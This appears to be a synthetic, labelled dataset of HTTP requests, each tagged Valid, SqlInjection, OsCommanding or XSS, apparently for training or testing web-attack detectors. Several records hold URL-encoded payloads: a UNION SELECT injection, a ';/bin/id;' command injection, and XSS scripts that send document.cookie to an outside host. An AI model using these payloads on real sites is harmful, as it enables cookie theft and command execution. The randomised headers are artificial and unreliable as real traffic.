ETag: W/"vdWWqXtR9BrkiOmHa"
Expect: 100-continue
From: scire@l29NotOrdn.be
If-Modified-Since: Sat, 23 May 09 19:27:05 GMT
If-Unmodified-Since: Sat, 11 Oct 08 20:24:39 CET
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 272
MIME-Version: 2.9
Pragma: no-cache
Proxy-Authorization: Digest uri=http://ismiws.org/bltnhue/eeeeezo.gif
Authorization: oSeN utuitr=sewWq
Range: 47781-
Referer: http://uos6.ch/emKniedi/goRt.asmx
TE: trailers,gzip;q=0.4
Trailer: Warning
User-Agent: olYsi0rm9h (ew9Tp@Eh2; hQlafQgH)
UA-CPU: PowerPC
UA-Disp: 9474,169,32
UA-OS: WinNT
UA-Color: color16
UA-Pixels: 539x1733
Via: FTP/3.9 151.95.120.35, 5.1 174.3.36.47:695, 2.8 www.QerdoO.shtml:82046
Transfer-Encoding: onei
Upgrade: geoaa/5.5, tnh/2.0, wawlno/4.1
Warning: 011 225.32.78.230 "otaEld4eerueo" "Sat, 17 Feb 07 07:52:31 CET"
X-Forwarded-For: 248.73.239.249
X-Serial-Number: 4037485153
----: -----------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 26242
Start - Id: 23611
class: Valid
GET /onWATpwBeB@ocR/CjvusrdCapAHH7Dmochaq/9eUlJcAmEYu/m7@AkX@MWok/ajcshr/lD7X/881ethdtmWe24talnunG/qunj9qBPvk/enzi9pac/Gznteh.html?mtwbtsd5ogEea0s=57699&afe=24515514&u_08v=2443643&rUhrhko4e=dasd&f6oGcwYJK=2094473&eyme=ht&2KE639=3593&pe=ps%25boot.inionVswindow.openEPenn&hfFasa7bPh=030&FtUf=19644&ace=s5ese1icatf%3D HTTP/1.1
Host: 20.118.145.11:566
Connection: keep-alive
Accept: */*
Accept-Charset: x-mac-cyrillic, euc-tw, iso-2022-jp;q=0.1, isiri-3342, windows-1250;q=0.6
Accept-Encoding: 
Accept-Language: diytc-eo, bs-aHfrsRS, cr-o8usz;q=0.6, iastns-80Tetli
Cache-Control: eovyus='s'
Client-ip: 89.91.63.105
Cookie: i2L2e=127;eH6okseaokre=pzMpasswd  dgJ8dtnru;O8seis=48400836;8Ta=Txml;dNexit=jU_FkVNHb
Cookie2: $Version="509"
Date: Wed, 14 Oct 09 02:05:58 GMT
ETag: W/"kS20elXrbw@h0wu"
Expect: n19dxo7
From: emWo@1nea.net
If-Modified-Since: Tue, 29 Mar 05 11:55:36 CET
If-Unmodified-Since: Tue, 29 Jul 08 12:43:57 GMT
If-Match: *
If-None-Match: "8Tm.1jhKExi_Kiap76Xw"
If-Range: *
Max-Forwards: 1856
MIME-Version: 1.2
Pragma: vtte=uidongMy
Proxy-Authorization: NTLM ck9id3B0bXdoZUFxZTRwcGVlaWluaG56cmxuZW9zazlGbjg=
Authorization: NTLM RWppbmZvaTBzY250eW5jdW44ZWlzc2VpZWlvZWNlNk5lZQ==
Range: 33-
Referer: http://www.aaunE4io.gov/1cds3/iso5e0/iirtmdur/f5xmE.php4
TE: deflate,trailers
Trailer: User-Agent
User-Agent: Mozilla/0.4 (compatible; Konqueror/1.1; Win98; gitn; 7amr; areerto9e)
UA-CPU: PowerPC
UA-Disp: 307,9074,16
UA-OS: Solaris
UA-Color: color32
UA-Pixels: 361x375
Via: 5.8 64.8.120.98, HTTP/8.4 77.173.249.161
Transfer-Encoding: identity
Upgrade: gktu/1.0, isTtr/8.1
Warning: 271 126.64.164.69:05658 "3ffD5oti2in" 
X-Forwarded-For: 161.208.121.203
X-Serial-Number: 266315250602737413
----: -------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 23611
Start - Id: 35317
class: SqlInjection
GET /0lan7tAyzoijp/12lXJ/rn@OQXKU5GR5hpdZ.dll?n8r=eboot.ini%3Cenu%3Ba%5D6h&drin0g=s0asuoa%3E3stw&7iL.t=+ds&dtw7elhmli=446821&erubrooekbsis99=eii&lgV6n43Xv_=in&dJ0x@.cD=sado&hsRert=9&ccSTelrtiq=%28a&SkralehiiMt=%27++++%29+UN%2F**%2FION++ALL+++++SEL%2F**%2FECT+%27yPaSvr1a%27%2C60998%2C516%2C%27dsfsel0d%27%2C9++FROM+++hcafoleWee+++++WHERE+++%28%27%27%3D++%27 HTTP/1.1
Host: 125.140.253.116
Connection: close
Accept: */*;q=0.4
Accept-Charset: *
Accept-Encoding: 
Accept-Language: *
Cache-Control: no-cache
Client-ip: 245.178.69.254
Cookie: tndee1ic6e=54;yeoHs1pFzi=47
Cookie2: $Version="92"
Date: Fri, 05 May 06 03:19:32 GMT
ETag: "@IHp0044BDAN5pIZOPDV"
Expect: 100-continue
From: kI3zct@drabH.cz
If-Modified-Since: Wed, 09 Dec 09 17:46:55 CET
If-Unmodified-Since: Tue, 04 May 10 10:19:23 UTC
If-Match: *
If-None-Match: *
If-Range: Wed, 24 Mar 04 10:27:30 UTC
Max-Forwards: 0016
MIME-Version: 6.6
Pragma: no-cache
Proxy-Authorization: saoa Iaepe=rennc
Authorization: Digest opaque="oyte"
Range: 9898-,30840-71
Referer: /yxdbanee/ihio4Uw.aspx
TE: trailers,gzip
Trailer: User-Agent
User-Agent: nc9ruDeuoH0tollyqe
UA-CPU: Sparc
UA-Disp: 420,4746,32
UA-OS: Windows 95
UA-Color: color8
UA-Pixels: 198x9357
Via: rc9uha/8.1 136.36.32.201
Transfer-Encoding: deflate
Upgrade: wndma7/6.1, z9unl/1.7, lis/6.7
Warning: 581 186.145.143.176 "jcaoFa" 
X-Forwarded-For: 111.116.93.90
X-Serial-Number: 37310092312923
----: ------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 35317
Start - Id: 43416
class: OsCommanding
GET /oinsmelzoep/es.aQq_5R/6XmMotwinnt5PhLNH2object/mhsRsi1aohoe/R8ecfonreiaoiisae/tbcp/6WKZgnG-Lh9evald/h-M4GE1G/7uannh/eneo.jpg?stexe=28&jaae4p=%3A&hU5smgtcwds=9kaoiIAbneNd8&logTidrsi=%5C%3B%5C%2Fbin%5C%2Fid%3B HTTP/1.0
Host: www.ea2whepr.biz
Connection: eetg
Accept: video/mpeg, video/quicktime, text/plain
Accept-Charset: *;q=0.0
Accept-Encoding: compress;q=0.5, compress;q=0.7, compress, compress
Accept-Language: sht-itT7ahhs;q=0.3, qey9zdT-DnTrS, es5z-asaip3t, urSnd-Asm;q=0.5
Cache-Control: no-cache
Client-ip: 164.53.226.238
Cookie: rmso=ndoectrsnih;nasd=9omoousar5on;iedpchemhiasT=047973341;5rdcsaw4=zp
Cookie2: $Version="4"
Date: Fri, 04 Aug 06 12:01:55 GMT
ETag: W/"oeuj7CbNiXs9jr4-G"
Expect: 100-continue
From: eM8p@ehnasbf.it
If-Modified-Since: Sun, 13 Jun 04 09:04:32 GMT
If-Unmodified-Since: Tue, 08 Jan 08 21:33:18 GMT
If-Match: *
If-None-Match: "_@yRQJp3P-8C4N73cHhN"
If-Range: Tue, 25 Apr 06 12:39:50 UTC
Max-Forwards: 10
MIME-Version: 5.1
Pragma: tzh='y'
Proxy-Authorization: NTLM RDdvbGF0YXBoaGNvaTFyYW5kZWRSc3NtSnMyc2luaHRNc2doZWVtZmE5ZTk=
Authorization: Digest qop=auth
Range: -99
Referer: http://p5shcaxh.biz/bzuelmuF/rhyodd/Tpats1.cgi
TE: trailers,trailers
Trailer: Expect
User-Agent: Mozilla/0.7 (Windows; U; Windows NT 1.3; ad-us; rv:1.9.1) Gecko/92812579
UA-CPU: 68000
UA-Disp: 2710,0982,16
UA-OS: Win98
UA-Color: color16
UA-Pixels: 319x516
Via: 2.6 www.iaE7Tao.css, 6.9 144.211.17.34, HTTP/2.0 138.161.184.6
Transfer-Encoding: identity
Upgrade: zos/3.8, LrxEi/5.1
Warning: 667 www.eekudeq.shtml "ep6tpihnare" 
X-Forwarded-For: 193.68.229.100
X-Serial-Number: 64752723331418038
----: --------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 43416
Start - Id: 8160
class: Valid
GET /YUooqx3RM_A-.cgi?Neicmtocrn=MrhWbr&r5thtmhqy=BohNahdGklPshome%7Efa&4iemhrota=ylinkigroup+bymdivgtt%2Btr%29uc4a%25tr&tE5J=16864&mailninsert-q7OumRvbscriptboot.ini=0&uadtae=%3D&1Z_LR=tk6IXJiJbB&titiead=A6povsrsteahtCkeO&tttotes=t1xgVhMlF9&qQXRcZX=3rwrta3&tHXnso=403932&jcOREmJr7K=rtm9migotcumtd3ln&mloLuaeuba=ohHihg3Qlb HTTP/1.1
Host: www.or6ree7.biz
Connection: eeebee
Accept: */*;q=0.2
Accept-Charset: *
Accept-Encoding: *;q=0.3
Accept-Language: *;q=0.6
Cache-Control: max-stale=3207
Client-ip: 37.79.11.217
Cookie: RtaegprhvguvIe=08;rN=7920577;nred5fhce=3583213;iuLot6Mrah7=94671;w7hrtxu=qoeSg$ke ;YMcN=h7nvt
Cookie2: $Version="339"
Date: Tue, 24 Jan 06 10:18:33 GMT
ETag: "i738Sb_GZH6SYk017vE"
Expect: 100-continue
From: lncsrs1@ssri.net
If-Modified-Since: Sat, 08 Aug 09 14:22:54 CET
If-Unmodified-Since: Thu, 25 May 06 10:25:19 GMT
If-Match: *
If-None-Match: "EbuiuqPvuC-GxU1z8-n"
If-Range: "TIkDODFrcj8n8k-9ZUv"
Max-Forwards: 120
MIME-Version: 4.7
Pragma: no-cache
Proxy-Authorization: icItwz 0ideTrr=voci
Authorization: Digest opaque="2hisNr"
Range: -340,51-69621,105-24
Referer: /hdmtt/hdhbulTd.php
TE: chunked,gzip
Trailer: Host
User-Agent: a0UNe/9.8.1.9.4
UA-CPU: StrongARM
UA-Disp: 4611,8979,32
UA-OS: Solaris
UA-Color: color8
UA-Pixels: 2774x909
Via: 3.7 83.158.4.105:5646, 8.8 119.10.240.55, 5.3 80.244.52.57
Transfer-Encoding: identity
Upgrade: eqnale/1.9
Warning: 208 212.220.114.189 "i1gaNj" 
X-Forwarded-For: 110.129.233.176
X-Serial-Number: 720236680723695
----: ---------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 8160
Start - Id: 32609
class: Valid
POST /tPuvoh/e5rhdmaaptJ/tdt3D3UpDXGCncsUua/wH69q/i19W9H/otodnPeaQhmTn/uWb2MZQZWO9gktw@PN9_/Ulnq8ucdosez/1w0DQujMO0FiVWB_/eegtscdopgjod8r/9u0kIgI_v_e/32ERGYx.jpeg? HTTP/1.1
Content-Length: 236
Content-Language: ito,8o2adda,8
Content-Encoding: identity
Content-Location: /aRlVon/hw8ODksq/Eiopr/s3azyet5/e9yN7.bin
Content-MD5: cnR0SG92YnZCdXhobnNwdA==
Content-Type: application/x-www-form-urlencoded
Expires: Mon, 24 Oct 05 09:22:53 UTC
Last-Modified: Sun, 02 Jan 05 01:00:03 UTC
Host: www.1irI.be:51576
Connection: tsMehfl
Accept: text/plain;q=0.4, text/plain;q=0.9
Accept-Charset: *
Accept-Encoding: *;q=0.0
Accept-Language: *;q=0.1
Cache-Control: no-transform
Client-ip: 53.223.182.85
Cookie: ivwbnNb=p5uimopens 
Cookie2: $Version="949"
Date: Fri, 01 Jun 07 15:57:40 UTC
ETag: W/"cw4BFNhsGmXr_fqW"
Expect: 100-continue
From: mhhvcrm@gtad.de
If-Modified-Since: Thu, 04 Jun 09 02:51:10 CET
If-Unmodified-Since: Sun, 13 Mar 05 06:26:36 GMT
If-Match: "vmxxUm8eOKVqJ3w"
If-None-Match: "5CBrglyCidtU98q4Lb"
If-Range: Mon, 18 Jul 05 02:07:26 GMT
Max-Forwards: 7
MIME-Version: 3.5
Pragma: no-cache
Proxy-Authorization: adtt9 cssas=aamp
Authorization: Digest response="7c1d718A56F83d31AD77eDea9fd0FC8E"
Range: -619576,782-7
Referer: http://cazuej.fr/e3HUe/t5e8t.jsp
TE: chunked;q=0.9
Trailer: Referer
User-Agent: clteooiuniaet
UA-CPU: PowerPC
UA-Disp: 776,700,8
UA-OS: Solaris
UA-Color: color16
UA-Pixels: 2740x572
Via: 2.7 45.33.67.29
Transfer-Encoding: identity
Upgrade: 0ss/3.7, rol/6.4, t7a/3.1, oeOo/5.0, iui/8.8
Warning: 600 www.oeyQ.gif:6 "MqLrrRse4tmzoe" 
X-Forwarded-For: 64.19.200.199
X-Serial-Number: 73155166220455300
----: -----------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~

Rss=9&upa7e=mgnojish7muxepeinn&twsio=a4&oiw4ymh7enoE=x4i7i8Jq8.&Yvtco=0drnesx&rsntluE4doda=57499934&mw=nte2xf%%t&OtioeurEhcw3ah=36935411&xl1hcu2dAtyant=dJdm2329Im0&rnR=caolri&ruuIiw7a8tt=99051388&hat=mnUCageeegYaK&E0UGjd3Z=669301755

End - Id: 32609
Start - Id: 12378
class: Valid
GET /wOdiisre6ny/qubwnEiy8tidy/QFgCbetween.tiff?rtreNe6a6mcAnen=ohpe&fryt=oesom++tua%27htaccesetc&0a4sU=09&wyygalI=sq%40pY51OiR&3ncitb7utrecKss=4oC&imn8uhAyT=edugL%28thrh9oonn&dratcdno8=sdcopshtacces%5De&FYhtaccesbetweenBDyJ@=thttpg&ethhnUmo=08993&rtn=ShlocationajH0j&odn7horlo=rJnS HTTP/1.1
Host: www.erleI4ettE.ch:80
Connection: close
Accept: text/*;q=0.4
Accept-Charset: *
Accept-Encoding: *
Accept-Language: *;q=0.6
Cache-Control: max-age=7
Client-ip: 98.43.226.106
Cookie: osra2gainsb=3thsnteimn?;esreAargswblo=P;rr] whusrO dtexecT;43seouwnfarw=rN2T06DEd;1Micaxaobms=u4q0gE_mwzTg
Cookie2: $Version="086"
Date: Sun, 11 Jul 04 10:02:31 CET
ETag: "gC1SeDJgLhgep.LRU9gF"
Expect: 100-continue
From: nn9ptett@eneaTr.com
If-Modified-Since: Fri, 15 Oct 04 02:16:24 UTC
If-Unmodified-Since: Fri, 13 Jun 08 19:15:00 GMT
If-Match: "fGzMjEZav.MNlxgb"
If-None-Match: *
If-Range: Wed, 30 Apr 08 24:50:08 UTC
Max-Forwards: 163
MIME-Version: 7.5
Pragma: eeatHs=l7rNrt9E
Proxy-Authorization: DuJm tcmeteLj=bonrctac
Authorization: leuiuF amatntoi=emrlitb
Range: -51069
Referer: http://hirNsL.gov/yrmsMit/oevu.exe
TE: trailers,trailers
Trailer: User-Agent
User-Agent: Mozilla/4.9 (X11; U; SunOS sun4u 7.4; nn-6a; rv:8.1.4) Gecko/88576926
UA-CPU: 68000
UA-Disp: 1831,152,16
UA-OS: Solaris
UA-Color: color16
UA-Pixels: 8258x863
Via: FTP/9.8 www.ganehort.html, HTTP/8.6 www.autU5.jpeg, exe/6.8 28.111.105.74
Transfer-Encoding: compress
Upgrade: ntp/2.8, lo7i86/1.7, Akwh/9.8, 0ehman/7.3, lohca/6.7
Warning: 502 103.250.166.240 "Eioyinr" 
X-Forwarded-For: 15.44.254.140
X-Serial-Number: 250138591797251529
----: ----------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 12378
Start - Id: 47084
class: XSS
GET /e0sPvZCqWd1c9j/e.TcsXuamCdDrvx/WT/ilooBms2etTazpeYr/lJ/m9TW5CX/aeahN09hTiehaeolg/gapptEtsohLsisWal/s.YAGjjFzjQxR1Jodz@q/8.JgnTPgOx-Ci/8pF3p_sH7KD.lL/9tAoes6efemrHiua.js?iaNnwperllMjetx=xA%28&hvdain7ReIx=%25u%3Cp&aThoiinec7ei9r=86&arnhi=He&saeespdjtc9rdbT=%3Ca++href++++%3D+%22+++++about%3A%3Cs%26%2399%3Bript+++%3E%5Bwindow.open%28%27http%3A%2F%2F100.159.192.52%2Fonti.cfm%27%2Bdocument.cookie%29%3B%5D%3C%2Fscript+++%3E%22+%3E&.servicesJ_yor=L%3Ereieqa&ieoekrsethnrtt=1 HTTP/1.1
Host: www.tDqre.org
Connection: close
Accept: video/*, text/xml;q=0.1, audio/x-wav
Accept-Charset: macintosh;q=0.5, euc-jp;q=0.4, x-mac-japanese, euc-tw, windows-1254;q=0.9
Accept-Encoding: 
Accept-Language: ebirEOio-8psO;q=0.9, o3pj-smrbis2;q=0.1, teeHli-quetan;q=0.6, mhotr-lFelnou;q=0.1
Cache-Control: gsaeTbp='itht'
Client-ip: 4.100.87.145
Cookie: ightNeedzele=k;ntteh2n=794;OEQlQM=n8pelShoreersaeRs;est=h ;4JO2=tQaMot-zsENP;qWa6wwbtlaa=148071
Cookie2: $Version="41"
Date: Thu, 26 Mar 09 17:59:08 GMT
ETag: W/"5flgWqTfDcqEkoyRjTt"
Expect: 100-continue
From: en3oiyg@ysel.org
If-Modified-Since: Sat, 03 Jul 04 04:06:42 CET
If-Unmodified-Since: Sat, 30 Oct 04 02:04:04 GMT
If-Match: *
If-None-Match: "XvGosSJ6ArIHb4SwJ"
If-Range: Thu, 18 Aug 05 15:18:58 UTC
Max-Forwards: 69
MIME-Version: 8.0
Pragma: esannB=eoOt9ke
Proxy-Authorization: sevi uteRs=ionsesm
Authorization: NTLM cmxpZWdvZGlkbHRkdGhyYWk1ZGl3TW1udmdNajd4dG50Yk8=
Range: -409656
Referer: http://www.sip0eIry.org/atseh9h/mtHeTtl/oeyti/soDirn9.php4
TE: trailers
Trailer: Warning
User-Agent: odzol3aate
UA-CPU: x86
UA-Disp: 016,6175,32
UA-OS: Windows 95
UA-Color: color32
UA-Pixels: 389x1282
Via: HTTP/0.1 198.232.0.144, 3yha2/7.3 www.srss.css
Transfer-Encoding: deflate
Upgrade: aaw/8.6, roe/2.3
Warning: 097 105.248.59.21 "trypi" "Sat, 04 Jun 05 05:58:55 UTC"
X-Forwarded-For: 69.181.229.169
X-Serial-Number: 60697232
----: -------------------------------
~~~~~: ~~~~~~~~~~~~~

null

End - Id: 47084
Start - Id: 6059
class: Valid
POST /kmJxsI/oxxh/nitdTOo/xsihlruadaie.html? HTTP/1.0
Content-Length: 23
Content-Language: 5,asi
Content-Encoding: identity
Content-Location: http://laeeS.cz/3sriaet.jpeg
Content-MD5: aWVhNWRjYmRmY3RoUnJuaA==
Content-Type: application/x-www-form-urlencoded
Expires: Mon, 20 Jun 05 09:14:19 GMT
Last-Modified: Sun, 27 Aug 06 07:01:16 GMT
Host: 74.220.150.31
Connection: jiqnhcAi
Accept: application/*;q=0.8, image/gif, image/png
Accept-Charset: *;q=0.1
Accept-Encoding: *;q=0.7
Accept-Language: *
Cache-Control: only-if-cached
Client-ip: 103.109.199.183
Cookie: aeoe=8l27XcQJMI;qI3oiaeR=yldOv
Cookie2: $Version="0"
Date: Fri, 31 Dec 04 07:19:18 GMT
ETag: "TUi5FSwO-E9pMVlOdb"
Expect: 100-continue
From: tlbaw@voaoyodah.biz
If-Modified-Since: Wed, 11 May 05 03:45:26 UTC
If-Unmodified-Since: Sat, 24 Mar 07 01:57:44 UTC
If-Match: ".v1u1w7NmL.eCeD"
If-None-Match: "L-KxdqwKEJbIeE6"
If-Range: Sat, 05 Apr 08 18:49:45 UTC
Max-Forwards: 9
MIME-Version: 3.9
Pragma: itrrs='daD'
Proxy-Authorization: IEaq ghnuWgnb=dheobaz4
Authorization: NTLM dGFpZW5Tc2d1aGlsc211dHpnc3RvZXVlYW9vcnlnc2l0ZTZDcmlsckdl
Range: -49420,-860
Referer: /einx.gz
TE: chunked;q=0.7
Trailer: If-Unmodified-Since
User-Agent: Mozilla/2.3 (X11; U; Linux i386 0.9; re-oa; rv:5.0.7) Gecko/06209930
UA-CPU: StrongARM
UA-Disp: 6911,1089,8
UA-OS: Win95
UA-Color: color8
UA-Pixels: 179x0676
Via: 4.8 www.or5Aanto.jpg, eeEp/2.0 www.eipsviA.css
Transfer-Encoding: identity
Upgrade: has5y/4.3, eeohRn/1.7, ahe/4.9, isrias/0.3, tsayOs/5.2
Warning: 497 56.128.16.254 "srleiwfnruIct" 
X-Forwarded-For: 162.114.213.90
X-Serial-Number: 172658995199339
----: ------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

nPgme9n0cee=oet6oc8sicc

End - Id: 6059
Start - Id: 32249
class: Valid
GET /anpEheUewyseao/_sPITQV7s6l/haSuIqE_J0n1376Z/u2iEs.htm?ieuhkt2jialwai=5o%29d8ob%7Cge&-H6Y8=eab&estih9itaq=erhdhohdwrhnsmotb&dasitstlo=995&rtzgfoiin1ps=6947&@7inputeLnSS=shutdownv&lwjouentpGmwsyd=75050154 HTTP/1.0
Host: 136.52.122.73
Connection: close
Accept: audio/*;q=0.5, video/mpeg, video/*;q=0.4
Accept-Charset: x-mac-korean, iso-8859-2, euc-jp, macintosh
Accept-Encoding: 
Accept-Language: Jna-R5r
Cache-Control: max-stale
Client-ip: 69.7.19.37
Cookie: cea='hue0passwdyydocument:e >she
Cookie2: $Version="57"
Date: Thu, 29 Jan 09 22:50:29 GMT
ETag: "7TxxON3@qF_7MM7tg2F"
Expect: liiw=oSls
From: ajtRne@yawe.com
If-Modified-Since: Thu, 02 Sep 04 02:05:28 CET
If-Unmodified-Since: Wed, 05 Nov 08 02:37:24 UTC
If-Match: *
If-None-Match: *
If-Range: "PD7A.oqGzwFFu8mgZwO"
Max-Forwards: 6277
MIME-Version: 7.8
Pragma: 1eni=hltc0npc
Proxy-Authorization: AIrohr nh5ho5ft=elhiago
Authorization: Basic ZTZja3lqYXQ6dGVndA==
Range: -1,-97620,-0636
Referer: /e3es/maEiie/rW0EO/oeidaja.gz
TE: trailers,trailers,trailers
Trailer: Warning
User-Agent: s4oIeP8 (nNDdRDT; adG9tcIH15; dclvgyis.E; jcSqVldCB; ieug9P6)
UA-CPU: StrongARM
UA-Disp: 8350,6514,8
UA-OS: Win95
UA-Color: color16
UA-Pixels: 2503x5889
Via: 6aica/4.0 www.sdflwru.htm, 9.7 212.101.240.215, erdice/0.2 255.142.87.153:77
Transfer-Encoding: gzip
Upgrade: fehAnr/5.2, a6eTe/9.4, heim/2.3
Warning: 330 www.en4chatr.gif "gimro07nicd5tc7s" 
X-Forwarded-For: 145.88.219.204
X-Serial-Number: 76488
----: ----------------------------------------------
~~~~~: ~~~~~~~~~~~~

null

End - Id: 32249
Start - Id: 22566
class: Valid
GET /eQaaRVY-/B4aRsTYF.php4? HTTP/1.1
Host: 199.201.40.125
Connection: close
Accept: video/quicktime
Accept-Charset: *
Accept-Encoding: identity, gzip;q=0.7, compress;q=0.8
Accept-Language: *;q=0.0
Cache-Control: max-age=8
Client-ip: 14.142.132.191
Cookie: E4deqlthoofz=7nlfis;c8AncTlYcE=8509566;luTgyBbitqeui=ktdTdrop;eihnbT=cnnee eoesock_streamtdn;ezprnltyuli=405
Cookie2: $Version="97"
Date: Sun, 05 Mar 06 07:13:48 GMT
ETag: W/"XAsOYXqELAWcTGvV"
Expect: sbtwss=YalrsR9d;tefcoaav
From: tetoseli@i9ihet.it
If-Modified-Since: Sun, 31 Oct 04 01:31:09 UTC
If-Unmodified-Since: Sun, 05 Nov 06 18:50:40 CET
If-Match: *
If-None-Match: "22jFQntsKMcztLPXNTn"
If-Range: Fri, 10 Oct 08 18:53:13 UTC
Max-Forwards: 5153
MIME-Version: 2.6
Pragma: no-cache
Proxy-Authorization: NTLM dGhkZkJhc241Z2RlRXF6YWl4bGFobGFzOGhhcnJPYXR4dG90aGllbmhzcGdz
Authorization: Basic c2lyaHdhY3A6YXZ1dE8=
Range: 008-622747,-490549,85-794080
Referer: http://www.3eoh9.fr/nscddla/hr5hiiDm/2ids3sne/tee79se/yeHt9h.dll
TE: trailers,trailers,trailers
Trailer: TE
User-Agent: Mozilla/1.8 (X11; U; Open BSD i386 2.2; oe-mi; rv:4.1.6) Gecko/19928383
UA-CPU: Sparc
UA-Disp: 5896,055,8
UA-OS: Win95
UA-Color: color32
UA-Pixels: 1663x456
Via: b6e/8.5 197.166.82.16
Transfer-Encoding: identity
Upgrade: sric/4.6, ineo7/5.6, uiont9/0.3, wEco3/6.9
Warning: 651 www.nfit.gif "ieetdewtnneo6h" 
X-Forwarded-For: 227.174.126.186
X-Serial-Number: 2569472
----: -----------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 22566
Start - Id: 47933
class: XSS
GET /ounodE8osanhXovthm/4eD3NmRvJb9eo-02O@G/arYelay/6jbcntoOetRrmdamgo2U/o44P-ba/Ll7caweah4e/Zfn.htm?ERiVFv=Eo&3fBr.xnetcatorkO_script=4&oothesbe=%5B%5CxC0%5D%5B%5CxBC%5Dscript+++%3E%5Bdocument.location.replace+++%28%27http%3A%2F%2Fwww.rineitta.com%2Fcgi-bin%2Fstto.cgi%27%2Bdocument.cookie%29%3B%5D%5B%5CxC0%5D%5B%5CxBC%5D%2Fscript%3E&Lyahrd=804449&mhhumann=ce%25ye&sdfMhgr=sqnxp6e4&fn=0482225&ssolimeneaat=mw4tmb6%24uddocumentes&mAgdl=%2Fls&eae12iCheiW=8500115&adenyh=5&ablrto=Nrn%7Co4 HTTP/1.0
Host: www.lyft0.cz
Connection: htmNfIO
Accept: */*
Accept-Charset: cp-932
Accept-Encoding: *
Accept-Language: 8kost-at
Cache-Control: no-cache
Client-ip: 99.239.86.40
Cookie: oek2jwtetpxq=oipwau;yiair1=e;F4yX=1;tmqqdeittreteea=ep)i;ceemocacd5Dzuaq=vcps dwinnta5 /jbpe?u9ej;evu1C@Gz5telnet2= ostyle1
Cookie2: $Version="613"
Date: Fri, 25 Sep 09 05:25:59 CET
ETag: "ftjXL.qa9aDa_vAZ2I5K"
Expect: on3be5=iadbe;seabhe=eetaKcek
From: Eawmtren@tifsCoeGen.net
If-Modified-Since: Mon, 04 May 09 08:44:10 UTC
If-Unmodified-Since: Sat, 01 Nov 08 03:38:33 UTC
If-Match: *
If-None-Match: *
If-Range: Tue, 07 Aug 07 01:36:24 UTC
Max-Forwards: 5120
MIME-Version: 2.0
Pragma: no-cache
Proxy-Authorization: xm5Eoo cesOKwc=keom4
Authorization: NTLM cm5vaTBsZXFucnR0ZWZTaTh0ZmRuc2lCNndjVGFlbm5hcmlhY3RobWRlZXNyNmFq
Range: 82-,097137-575
Referer: /6norSea/eiietEes/sheis.jpeg
TE: trailers,gzip;q=0.8
Trailer: Max-Forwards
User-Agent: Mozilla/4.7 (Machintosh; U; PPC Mac OS X 8.7; bt-ld; rv:4.1.2) Gecko/36847811
UA-CPU: Sparc
UA-Disp: 216,2039,8
UA-OS: FreeBSD
UA-Color: color8
UA-Pixels: 229x467
Via: 9.9 217.215.191.236:77772, 21dee/5.3 www.mhaqwte.jpeg
Transfer-Encoding: deflate
Upgrade: rmhmkL/0.0, a6ssth/8.0, pto/4.4, edcoWe/0.0
Warning: 074 www.lhduar.css "seste7nmh6" "Tue, 21 Sep 04 11:27:26 UTC"
X-Forwarded-For: 108.243.93.109
X-Serial-Number: 99981818426626
----: -------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 47933
Start - Id: 24721
class: Valid
GET /thamB6rksoen0oae/2jp66IJrs@9vy7s9-/gQcP86KsIisdB1I/tnzD/o8L5wVstn6cmdconnectaQ/iRGiPayQ/ryteKmsP/t1C1Mci7.A9SjEPKvZv/yeslriceerr.msf?lsnedtnunhaks=w%3B+eemmnetv&euktl=56&ic=NfrtrTaoOli&tani7udgarta=%24&tolew=40375961&Ds0Z=44787&ndutorioouo=t02%2Bnowoge&ywn=ay8allh+u%3Fc&nhos=yhxniszawOellwo&ubot=202464369&1esAzor=104&ewwesb4=3787010&_I6openodWDP9=-axft&iqKedg0hqoj=0oaongrirdohmlwe HTTP/1.0
Host: 234.143.110.44
Connection: close
Accept: text/*, application/*;q=0.0
Accept-Charset: big5
Accept-Encoding: identity;q=0.3, gzip
Accept-Language: *;q=0.4
Cache-Control: 5n='lptsng'
Client-ip: 246.244.195.20
Cookie: rE2la88auie6wha=enh=i;tt3ltzarm=script;mrucDaiseoh5m=861;_Jdb=1henataam/n
Cookie2: $Version="65"
Date: Sat, 27 Nov 04 02:59:19 CET
ETag: W/"cqWDGu17PF9Kw@Joto"
Expect: 100-continue
From: rtat7i@re8ta.net
If-Modified-Since: Wed, 15 Jul 09 04:38:30 CET
If-Unmodified-Since: Sun, 17 Apr 05 22:43:46 UTC
If-Match: "m80TAJl8TPgO7XVi"
If-None-Match: *
If-Range: Tue, 01 Aug 06 20:26:59 CET
Max-Forwards: 721
MIME-Version: 6.5
Pragma: hondde=a1w0w
Proxy-Authorization: NTLM YWJvdG5vbHJzdHNlbXJvZmlldTJkT2VnYWRSc1B5bzdlaWJodGNy
Authorization: nouamg sniesg=oGjsts
Range: 94913-68559,806419-4130
Referer: http://www.snra3nn.uk/o7rY/aPai/iae3feei.mspx
TE: gzip;q=0.0,deflate;q=0.6
Trailer: Max-Forwards
User-Agent: Mozilla/1.0 (Machintosh; U; Mac OS X 2.3; po-eU; rv:8.9.5) Gecko/17927801
UA-CPU: PowerPC
UA-Disp: 9340,8339,32
UA-OS: Solaris
UA-Color: color8
UA-Pixels: 1017x8120
Via: FTP/3.0 www.exnbfE9R.gif
Transfer-Encoding: bhcai
Upgrade: utt/2.3, OloG/9.0
Warning: 261 www.tddrisan.shtml:4608 "amni" 
X-Forwarded-For: 127.43.236.207
X-Serial-Number: 22326900137086
----: --------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 24721
Start - Id: 13278
